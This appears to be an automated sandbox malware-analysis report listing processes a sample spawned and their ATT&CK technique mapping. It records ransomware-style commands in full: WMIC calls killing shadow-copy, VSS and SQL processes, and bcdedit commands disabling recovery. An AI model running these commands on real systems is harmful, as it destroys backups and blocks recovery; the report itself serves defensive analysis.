C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%swprv%%'" call terminate
3⤵
PID:1924

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%VSSVC%%'" call terminate
3⤵
PID:1980

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%sqlsrvr%%'" call terminate
3⤵
PID:576

C:\Windows\system32\bcdedit.exe
"C:\Windows\system32\bcdedit.exe" /set -encodedCommand ZABlAGYAYQB1AGwAdAA= recoveryenabled No -inputFormat xml -outputFormat text
3⤵
- Modifies boot configuration data using bcdedit
PID:2024

C:\Windows\system32\bcdedit.exe
"C:\Windows\system32\bcdedit.exe" /set -encodedCommand ZABlAGYAYQB1AGwAdAA= bootstatuspolicy ignoreallfailures -inputFormat xml -outputFormat text
3⤵
- Modifies boot configuration data using bcdedit
PID:1968

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
- Modifies service
PID:1784

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

1

T1031

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

File Deletion

2

T1107

Modify Registry

2

T1112

Credential Access

Credentials in Files

1

T1081

Discovery

Remote System Discovery

1

T1018

Lateral Movement

Collection

Data from Local System

1

T1005

Exfiltration

Command and Control

Impact

Inhibit System Recovery

3

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads